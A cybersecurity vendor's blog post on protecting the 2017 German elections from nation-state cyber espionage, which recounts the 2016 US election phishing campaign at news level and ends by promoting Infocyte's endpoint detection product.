Protecting Democratic Elections from Cyber Attack
Bundesamt für Verfassungsschutz (BfV), has Warned for Increasing Nation-State Cyber Espionage
German elections are scheduled for September, and the country’s authorities are determined to conduct them without interference, especially Russian interference. The German domestic intelligence and security service, Bundesamt für Verfassungsschutz (BfV), has warned of the ever-increasing instances of nation-state cyber espionage.
The BfV’s Annual Report on the Protection of the Constitution highlights the activities of Russia, China, and Iran as being the primary players in the world of cyber espionage targeting German interests. Russia is primarily focused on pushing its political and geopolitical narrative. China, however, is focused on industry, research, technology and the armed forces. The Iranian effort has been focused on critical infrastructure, with cyber attacks not only being used for information collection but also for sabotage purposes.
Cyber Commands flourish in Europe
In recognition of the growing cyber threat the German military, or Bundeswehr, launched a new Cyber and Information Space Command (CIS) in April to tackle attacks from hackers and foreign spy agencies.
The Bundeswehr has long been seen as a high-value target because of its military secrets, but its IT-supported weapons systems also mean that a successful cyber attack could have devastating global consequences. The CIS is by no means the first cyber command to be established in Europe. The EU’s European Cybercrime Centre was established in 2013 and has a threefold focus on forensics, strategy, and operations. In France, the Sub-directorate in the fight against cybercrime was established in 2014 and is staffed both by gendarmes, who are part of the military, and the police. The SDLC works closely with EC3.
In June 2016, NATO designated cyber as an official operational domain of warfare, along with air, land, and sea, having witnessed a five-fold increase in suspicious events on its networks in the previous three years. The UK moved towards a more active defense of cyberspace in 2016 when it created the National Cyber Security Centre. It aims to protect government and critical infrastructure from cyber attack and is part of GCHQ, the UK Government Communications Headquarters.
It is perhaps no coincidence that, following allegations of Russian interference in the US presidential elections last year, Germany has chosen to launch CIS in 2017, the year when its own elections will be held.
Lessons learned from the 2016 US Presidential Election
As the general election date in Germany draws closer, it can be expected that cyber attacks will increase. An NSA intelligence report on Russian interference in the 2016 Presidential election noted that Russian military intelligence executed a cyberattack on at least one US voting software supplier and sent spear-phishing emails to more than 100 local election officials just days prior to the election. The report analyzed intelligence about the months-long Russian intelligence cyber effort against elements of the US election and voting infrastructure.
It appears that Russian government hackers focused on parts of the system directly connected to the voter registration process, including a private sector manufacturer of devices that maintain and verify voter rolls. The phishing campaign was simple: pose as an e-voting vendor and trick local government employees into opening Microsoft Word documents laced with invisible malware that provided hackers full control over infected computers.
These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files likely would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report said could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocked and opened the target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.
Operations to influence electoral outcomes have been ongoing for over 10 years. As these operations grow in frequency, reach and sophistication, it becomes all the more important to take action to prepare and react. The damage that these operations wreak cannot be overstated.
Further, once malware has been discovered and the political establishment shifts into damage control – the secondary issue of focus must be the supplemental malware that has been seeded by the primary breaching software.
Organizations require the ability to determine that a breach has been fully and completely addressed and rectified. The integrity of the system needs to be protected. Political parties, candidates and the political infrastructures of all European countries must be rigorously defended.
Take a Proactive Stance with Infocyte
True defense is much more than standard typical defensive measures. In the same way that soldiers patrol border walls, electronic systems and data require vigilant and regular spot checks.
Infocyte HUNT offers organizations the ability to scan endpoints, find and identify any suspicious software that has penetrated defenses – whether it’s known as malware or not. This action of validating the health of an endpoint provides a very unique and specific reassurance.
In the current geopolitical climate, it is incumbent upon each and every political actor to take all possible steps to protect the integrity of the democratic political system and government.
Infocyte is an easy path to implement EDR or MDR for mid-size organizations. Learn more from Forrester's Now Tech Report here.
Interested in Sunburst and how to address compromises on your network?
Test out Infocyte's endpoint detection and response platform for free with our community edition: